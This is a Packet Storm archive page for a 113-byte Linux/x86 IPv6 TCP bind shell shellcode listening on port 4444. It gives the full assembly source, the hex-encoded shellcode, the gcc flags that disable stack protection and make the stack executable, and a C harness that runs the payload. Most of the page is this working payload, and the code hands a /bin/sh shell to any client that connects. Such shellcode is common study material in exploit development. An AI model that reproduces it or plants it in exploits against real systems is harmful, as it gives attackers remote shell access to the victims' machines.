exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Linux/x86 IPv6 TCP Bindshell Port 4444 Shellcode

Linux/x86 IPv6 TCP Bindshell Port 4444 Shellcode
Posted May 24, 2018
Authored by Matteo Malvica

113 bytes small Linux/x86 IPv6 TCP bindshell on port 4444 shellcode.

tags | x86, tcp, shellcode
systems | linux
SHA-256 | 47d6c0aa04034b7b7b7f8d99b2ba6240275cd794978fea5a06b6ddc8d70add0e

Linux/x86 IPv6 TCP Bindshell Port 4444 Shellcode

Change Mirror Download
// # Title: Linux/x86 - IPv6 TCP bind tcp shell on 4444 port
// # Length : 113 bytes
// # Author : Matteo Malvica
// # Tested On : kali linux 4.15
// # Contact : matteo@malvica.com
// # Description: it creates an IPv6 socket on localhost ::1 and listens on port 4444

/*

global _start
section .text

_start:

;; ipv6 socket creation
push 0x6 ; protocol IPv6
push 0x1 ; socket_type=SOCK_STREAM (0x1)
push 0xa ; AF_INET6
xor eax,eax ; zero out eax
xor ebx,ebx ; zero out ebx
mov al,0x66 ; syscall: sys_socketcall + cleanup eax register
inc ebx ; 1 = SYS_socket
mov ecx,esp ; save pointer (ESP) to socket() args (ECX)
int 0x80
mov esi,eax ; saves socket descriptor
xor eax,eax

;;bind
push DWORD eax ;ipv6 loopback pushed as x4 dword
push DWORD eax
push DWORD eax
push DWORD eax
push DWORD eax ;sin6_addr
push WORD 0x5c11 ;port 4444
push WORD 0x0a ;AF_INET6
mov ecx,esp
push 0x1c
push ecx
push esi
dec ebx
mov bl,0x2
mov ecx,esp
mov al,0x66
int 80h

;;listen
xor eax,eax
xor ebx,ebx
push byte 0x2
push esi
mov ecx,esp
mov bl,0x4
mov al,0x66
int 80h

;;accept
xor ebx,ebx
push ebx
push ebx
push esi
mul ebx
mov bl,0x5
mov al,0x66
mov ecx,esp
int 80h

sub ecx, ecx
mov cl, 0x2 ;initiate counter
xchg ebx,eax ;save clientfd

; loop through three sys_dup2 calls to redirect stdin(0), stdout(1) and stderr(2)
loop2:
mov al, 0x3f ;syscall: sys_dup2
int 0x80 ;exec sys_dup2
dec ecx ;decrement loop-counter
jns loop2 ;as long as SF is not set -> jmp to loop

;;execve(/bin//sh)
xor edx,edx
push edx ;null terminated /bin//sh
push 0x68732f2f ;"hs//"
push 0x6e69622f ;"nib/"
mov ebx,esp
push edx
push ebx
mov ecx,esp
mov al,0x0b ;execve()
int 0x80

*/

/*
to compile the shellcode

$gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
$./shellcode

*/


#include <stdio.h>

unsigned char shellcode[] = \
"\x6a\x06\x6a\x01\x6a\x0a\x31\xc0\x31\xdb\xb0\x66\x43\x89\xe1\xcd\x80\x89\xc6\x31\xc0\x50\x50\x50\x50\x50\x66\x68\x11\x5c\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x4b\xb3\x02\x89\xe1\xb0\x66\xcd\x80\x31\xc0\x31\xdb\x6a\x02\x56\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56\xf7\xe3\xb3\x05\xb0\x66\x89\xe1\xcd\x80\x31\xc9\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";


main()
{
printf("Shellcode Length: %d\n", sizeof(shellcode) - 1);
int (*ret)() = (int(*)())shellcode;
ret();
}

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close